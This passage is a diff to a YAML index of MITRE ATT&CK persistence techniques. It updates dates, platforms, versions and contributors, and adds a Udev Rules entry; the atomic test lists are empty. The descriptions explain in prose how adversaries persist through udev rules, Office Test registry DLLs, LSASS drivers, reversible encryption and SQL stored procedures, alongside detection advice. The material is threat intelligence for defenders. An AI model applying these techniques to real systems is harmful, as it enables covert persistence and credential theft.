+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1556.005:
+    technique:
+      modified: '2024-08-26T15:40:31.871Z'
       name: Reversible Encryption
       description: |-
         An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The <code>AllowReversiblePasswordEncryption</code> property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
@@ -35159,6 +35521,7 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor property changes in Group Policy: <code>Computer
         Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
         Policy\\Store passwords using reversible encryption</code>. By default, the
@@ -35169,23 +35532,50 @@ persistence:
         Directory PowerShell modules, such as <code>Set-ADUser</code> and <code>Set-ADAccountControl</code>,
         that change account configurations. \n\nMonitor Fine-Grained Password Policies
         and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Command: Command Execution'
       - 'User Account: User Account Metadata'
       - 'Script: Script Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+      created: '2022-01-13T20:02:28.349Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/005
+        external_id: T1556.005
+      - source_name: dump_pwd_dcsync
+        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+        url: https://adsecurity.org/?p=2053
+      - source_name: store_pwd_rev_enc
+        description: Microsoft. (2021, October 28). Store passwords using reversible
+          encryption. Retrieved January 3, 2022.
+        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+      - source_name: how_pwd_rev_enc_1
+        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+          encryption: how it works (part 1). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+      - source_name: how_pwd_rev_enc_2
+        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+          encryption: how it works (part 2). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1546.016:
     technique:
-      modified: '2024-04-12T02:23:44.583Z'
+      modified: '2024-04-28T15:52:44.332Z'
       name: Installer Packages
       description: |-
         Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
@@ -35202,7 +35592,7 @@ persistence:
         phase_name: persistence
       x_mitre_contributors:
       - Brandon Dalton @PartyD0lphin
-      - Alexander Rodchenko
+      - Rodchenko Aleksandr
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -35261,7 +35651,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.004:
     technique:
@@ -35343,7 +35732,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.004
     atomic_tests: []
   T1543.002:
@@ -35458,12 +35846,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.002
     atomic_tests: []
   T1136:
     technique:
-      modified: '2024-01-31T20:46:43.215Z'
+      modified: '2024-10-15T15:53:21.895Z'
       name: Create Account
       description: |-
         Adversaries may create an account to maintain access to victim systems.(Citation: Symantec WastedLocker June 2020) With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
@@ -35486,16 +35873,15 @@ persistence:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Network
       - Containers
       - SaaS
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
@@ -35522,7 +35908,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.013:
     technique:
@@ -35591,7 +35976,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.007:
     technique:
@@ -35627,7 +36011,7 @@ persistence:
         Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named <code>com.apple.loginwindow.[UUID].plist</code> within the <code>~/Library/Preferences/ByHost</code> directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
 
         Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the <code>com.apple.loginwindow.[UUID].plist</code> file to execute payloads when a user logs in.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T23:46:56.443Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Autostart Execution: Re-opened Applications'
       x_mitre_detection: Monitoring the specific plist files associated with reopening
@@ -35646,12 +36030,11 @@ persistence:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.007
     atomic_tests: []
   T1574.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.241Z'
       name: 'Hijack Execution Flow: DLL Side-Loading'
       description: |-
         Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -35701,12 +36084,11 @@ persistence:
         url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.002
     atomic_tests: []
   T1098.002:
     technique:
-      modified: '2024-01-03T15:46:06.706Z'
+      modified: '2024-10-15T15:37:25.303Z'
       name: 'Account Manipulation: Additional Email Delegate Permissions'
       description: "Adversaries may grant additional permission levels to maintain
         persistent access to an adversary-controlled email account. \n\nFor example,
@@ -35739,9 +36121,10 @@ persistence:
       x_mitre_contributors:
       - Microsoft Detection and Response Team (DART)
       - Mike Burns, Mandiant
-      - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
       - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
       - Arad Inbar, Fidelis Security
+      - Nilesh Dherange (Gurucul)
+      - Naveen Vijayaraghavan
       x_mitre_deprecated: false
       x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
         permissions changes that may indicate excessively broad permissions being
@@ -35758,9 +36141,8 @@ persistence:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '2.1'
+      - Office Suite
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Group: Group Modification'
       - 'Application Log: Application Log Content'
@@ -35806,12 +36188,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.002
     atomic_tests: []
   T1653:
     technique:
-      modified: '2023-09-30T21:28:45.038Z'
+      modified: '2024-10-16T20:11:40.334Z'
       name: Power Settings
       description: |-
         Adversaries may impair a system's ability to hibernate, reboot, or shut down in order to extend access to infected machines. When a computer enters a dormant state, some or all software and hardware may cease to operate which can disrupt malicious activity.(Citation: Sleep, shut down, hibernate)
@@ -35825,7 +36206,7 @@ persistence:
       - kill_chain_name: mitre-attack
         phase_name: persistence
       x_mitre_contributors:
-      - Goldstein Menachem
+      - Menachem Goldstein
       - Juan Tapiador
       x_mitre_deprecated: false
       x_mitre_detection: "Command-line invocation of tools capable of modifying services
@@ -35884,7 +36265,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.001:
     technique:
@@ -35910,7 +36290,7 @@ persistence:
         url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/
         description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part
           18. Retrieved November 15, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T23:45:03.153Z'
       name: 'Boot or Logon Initialization Scripts: Logon Script (Windows)'
       description: "Adversaries may use Windows logon scripts automatically executed
         at logon initialization to establish persistence. Windows allows logon scripts
@@ -35936,13 +36316,11 @@ persistence:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
       - 'Windows Registry: Windows Registry Key Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1037.001
     atomic_tests: []
   T1137.002:
     technique:
-      modified: '2024-04-16T12:41:55.175Z'
+      modified: '2024-10-15T16:01:48.325Z'
       name: 'Office Application Startup: Office Test'
       description: |-
         Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy)
@@ -35966,8 +36344,8 @@ persistence:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Office 365
-      x_mitre_version: '1.2'
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'Command: Command Execution'
@@ -35997,7 +36375,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1137.002
     atomic_tests: []
   T1547.008:
@@ -36040,7 +36417,7 @@ persistence:
         Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)
 
         Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:34:43.405Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Autostart Execution: LSASS Driver'
       x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events
@@ -36065,12 +36442,11 @@ persistence:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.008
     atomic_tests: []
   T1078.004:
     technique:
-      modified: '2024-03-29T15:42:13.499Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Cloud Accounts'
       description: "Valid accounts in cloud environments may allow adversaries to
         perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -36110,8 +36486,10 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
         or malicious behavior, such as accessing information outside of the normal
@@ -36119,13 +36497,13 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.7'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.8'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -36156,17 +36534,14 @@ persistence:
         url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.004
     atomic_tests: []
   T1053.002:
     technique:
-      modified: '2023-11-15T14:38:10.876Z'
+      modified: '2024-10-12T15:53:12.333Z'
       name: 'Scheduled Task/Job: At'
       description: |-
-        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
 
         On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the <code>at.allow</code> file. If the <code>at.allow</code> file does not exist, the <code>at.deny</code> file is checked. Every username not listed in <code>at.deny</code> is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the <code>at.deny</code> exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
 
@@ -36229,7 +36604,7 @@ persistence:
       - Windows
       - Linux
       - macOS
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Scheduled Job: Scheduled Job Creation'
@@ -36263,8 +36638,8 @@ persistence:
         url: https://man7.org/linux/man-pages/man1/at.1p.html
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Microsoft Scheduled Task Events Win10
         description: Microsoft. (2017, May 28). Audit Other Object Access Events.
           Retrieved June 27, 2019.
@@ -36273,6 +36648,10 @@ persistence:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Malicious Life by Cybereason
+        description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+          the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+        url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -36285,12 +36664,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.002
     atomic_tests: []
   T1556:
     technique:
-      modified: '2024-04-11T21:51:44.851Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Modify Authentication Process
       description: |-
         Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -36303,6 +36681,7 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Chris Ross @xorrior
       x_mitre_deprecated: false
@@ -36339,17 +36718,17 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
       - Network
-      - Azure AD
-      - Google Workspace
       - IaaS
-      - Office 365
       - SaaS
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Process: Process Access'
@@ -36395,9 +36774,65 @@ persistence:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+    atomic_tests: []
+  T1546.017:
+    technique:
+      modified: '2024-11-11T19:05:38.708Z'
+      name: Udev Rules
+      description: |-
+        Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
+
+        Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Eduardo González Hernández (@codexlynx)
+      - Eder Pérez Ignacio, @ch4ik0
+      - Wirapong Petshagun
+      - "@grahamhelton3"
+      - Ruben Groenewoud, Elastic
+      x_mitre_deprecated: false
+      x_mitre_detection: 'Monitor file creation and modification of Udev rule files
+        in `/etc/udev/rules.d/`, `/lib/udev/rules.d/`, and /usr/lib/udev/rules.d/,
+        specifically the `RUN` action key commands.(Citation: Ignacio Udev research
+        2024) '
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'File: File Modification'
+      type: attack-pattern
+      id: attack-pattern--f4c3f644-ab33-433d-8648-75cc03a95792
+      created: '2024-09-26T17:02:09.888Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1546/017
+        external_id: T1546.017
+      - source_name: Ignacio Udev research 2024
+        description: Eder P. Ignacio. (2024, February 21). Leveraging Linux udev for
+          persistence. Retrieved September 26, 2024.
+        url: https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/
+      - source_name: Elastic Linux Persistence 2024
+        description: Ruben Groenewoud. (2024, August 29). Linux Detection Engineering
+          -  A Sequel on Persistence Mechanisms. Retrieved October 16, 2024.
+        url: https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms
+      - source_name: Reichert aon sedexp 2024
+        description: 'Zachary Reichert. (2024, August 19). Unveiling "sedexp": A Stealthy
+          Linux Malware Exploiting udev Rules. Retrieved September 26, 2024.'
+        url: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.007:
     technique:
@@ -36434,7 +36869,7 @@ persistence:
         Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at <code>HKLM\SOFTWARE\Microsoft\Netsh</code>.
 
         Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T17:09:17.363Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Event Triggered Execution: Netsh Helper DLL'
       x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes
@@ -36458,51 +36893,11 @@ persistence:
       - SYSTEM
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.007
     atomic_tests: []
   T1505.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Carlos Borges, @huntingneo, CIP
-      - Lucas da Silva Pereira, @vulcanunsec, CIP
-      - Kaspersky
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a
-      type: attack-pattern
-      created: '2019-12-12T14:59:58.168Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1505.001
-        url: https://attack.mitre.org/techniques/T1505/001
-      - source_name: NetSPI Startup Stored Procedures
-        url: https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/
-        description: 'Sutherland, S. (2016, March 7). Maintaining Persistence via
-          SQL Server – Part 1: Startup Stored Procedures. Retrieved July 8, 2019.'
-      - source_name: Kaspersky MSSQL Aug 2019
-        url: https://securelist.com/malicious-tasks-in-ms-sql-server/92167/
-        description: 'Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote
-          attack on Microsoft SQL Server. Retrieved September 4, 2019.'
-      - source_name: Microsoft xp_cmdshell 2017
-        url: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017
-        description: Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved
-          September 9, 2019.
-      - source_name: Microsoft CLR Integration 2017
-        url: https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017
-        description: Microsoft. (2017, June 19). Common Language Runtime Integration.
-          Retrieved July 8, 2019.
-      - source_name: NetSPI SQL Server CLR
-        url: https://blog.netspi.com/attacking-sql-server-clr-assemblies/
-        description: Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies.
-          Retrieved July 8, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-10-15T16:05:24.007Z'
       name: SQL Stored Procedures
       description: "Adversaries may abuse SQL stored procedures to establish persistent
         access to systems. SQL Stored Procedures are code that can be saved and reused
@@ -36525,20 +36920,57 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Carlos Borges, @huntingneo, CIP
+      - Lucas da Silva Pereira, @vulcanunsec, CIP
+      - Kaspersky
+      x_mitre_deprecated: false
       x_mitre_detection: 'On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation:
         NetSPI Startup Stored Procedures) Consider enabling audit features that can
         log malicious startup activities.'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Linux
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a
+      created: '2019-12-12T14:59:58.168Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1505/001
+        external_id: T1505.001
+      - source_name: Microsoft CLR Integration 2017
+        description: Microsoft. (2017, June 19). Common Language Runtime Integration.
+          Retrieved July 8, 2019.
+        url: https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017
+      - source_name: Microsoft xp_cmdshell 2017
+        description: Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved
+          September 9, 2019.
+        url: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017
+      - source_name: Kaspersky MSSQL Aug 2019
+        description: 'Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote
+          attack on Microsoft SQL Server. Retrieved September 4, 2019.'
+        url: https://securelist.com/malicious-tasks-in-ms-sql-server/92167/
+      - source_name: NetSPI Startup Stored Procedures
